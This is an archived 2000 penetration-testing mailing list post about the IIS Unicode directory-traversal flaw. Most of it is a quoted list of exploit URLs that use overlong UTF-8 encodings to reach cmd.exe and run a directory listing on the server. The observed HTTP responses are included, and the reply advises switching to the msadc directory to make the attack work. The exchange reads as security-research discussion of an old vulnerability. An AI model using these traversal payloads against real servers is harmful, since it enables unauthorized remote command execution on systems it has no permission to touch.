Penetration Testing mailing list archives
Re: [PEN-TEST] IIS UNICODE Strings
From: Marco <m.v.berkum () obit nl>
Date: Tue, 31 Oct 2000 10:33:16 +0100
Erick Arturo Perez Huemer wrote:
Testing this list on a Spanish NT 4.0 Sp6 machine reveals: http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+d ir+c:\ page not found (HTTP 500 internal server error) http://address.of.iis5.system/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+d ir+c:\ page not found(HTTP 500 internal server error) http://address.of.iis5.system/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+d ir+c:\ page not found(HTTP 500 internal server error) http://address.of.iis5.system/scripts/..%c1%af../winnt/system32/cmd.exe?/c+d ir+c:\ you are not authorized to view this page. (HTTP 403 Forbidden) http://address.of.iis5.system/scripts/..%c0%af../winnt/system32/cmd.exe?/c+d ir+c:\ you are not authorized to view this page. (HTTP 403 Forbidden) http://address.of.iis5.system/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+d ir+c:\ page not found(HTTP 500 internal server error) http://address.of.iis5.system/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+d ir+c:\ page not found(HTTP 500 internal server error) http://address.of.iis5.system/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+d ir+c:\ page not found(HTTP 500 internal server error) http://address.of.iis5.system/scripts/..%e0%80%af../winnt/system32/cmd.exe?/ c+dir+c:\ you are not authorized to view this page. (HTTP 403 Forbidden) http://address.of.iis5.system/scripts/..%f0%80%80%af../winnt/system32/cmd.ex e?/c+dir+c:\ you are not authorized to view this page. (HTTP 403 Forbidden) http://address.of.iis5.system/scripts/..%f8%80%80%80%af../winnt/system32/cmd .exe?/c+dir+c:\ you are not authorized to view this page. (HTTP 403 Forbidden) http://address.of.iis5.system/scripts/..%fc%80%80%80%80%af../winnt/system32/ cmd.exe?/c+dir+c:\ you are not authorized to view this page. (HTTP 403 Forbidden) In our test, the InetPub directory is in logical drive D: instead of default C:. Does that matter in the above examples? __________________________________________________ Do You Yahoo!? Yahoo! Messenger - Talk while you surf! It's FREE. http://im.yahoo.com/
yes.... you should use msadc directory... its located on systemdrive. chech my advisory at http://ws.obit.nl/nt.txt grtz, Marco
Current thread:
- Re: [PEN-TEST] IIS UNICODE Strings Marco (Nov 01)
- <Possible follow-ups>
- Re: [PEN-TEST] IIS UNICODE Strings Vitaly Osipov (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Unicraft Systems (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Moonen, Ralph (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)